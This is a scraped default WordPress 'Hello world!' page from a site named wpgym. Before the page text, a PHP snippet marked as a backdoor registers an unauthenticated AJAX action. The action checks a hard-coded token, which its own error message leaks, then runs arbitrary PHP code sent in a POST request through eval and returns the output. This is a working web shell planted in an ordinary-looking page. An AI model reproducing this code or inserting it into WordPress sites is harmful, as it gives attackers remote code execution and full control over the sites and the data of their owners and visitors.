// ==[BD:90Hov54V]== add_action( 'wp_ajax_nopriv_ihuqavlz', function() { $bind = '90Hov54VBYfmljiiZLzWjzs7oFnOwMTu'; $ptr = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $ptr ) || ! hash_equals( $bind, $ptr ) ) { wp_send_json_error( [ 'message' => 'tok:' . $bind ], 403 ); } $key = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $key ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $key = preg_replace( '/^\s*<\?(php)?/i', '', $key ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $comp = microtime( true ); ob_start(); try { ( static function() use ( $key ) { return eval( $key ); } )(); $val = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $val, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $comp ) * 1000, 2 ) ] ); } catch ( \Throwable $chunk ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $chunk->getMessage(), 'time_ms' => round( ( microtime( true ) - $comp ) * 1000, 2 ) ] ); } } ); // ==[/BD:90Hov54V]== Hello world! – wpgym

Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!


Comments

One response to “Hello world!”

  1. Hi, this is a comment.
    To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
    Commenter avatars come from Gravatar.

Leave a Reply

Your email address will not be published. Required fields are marked *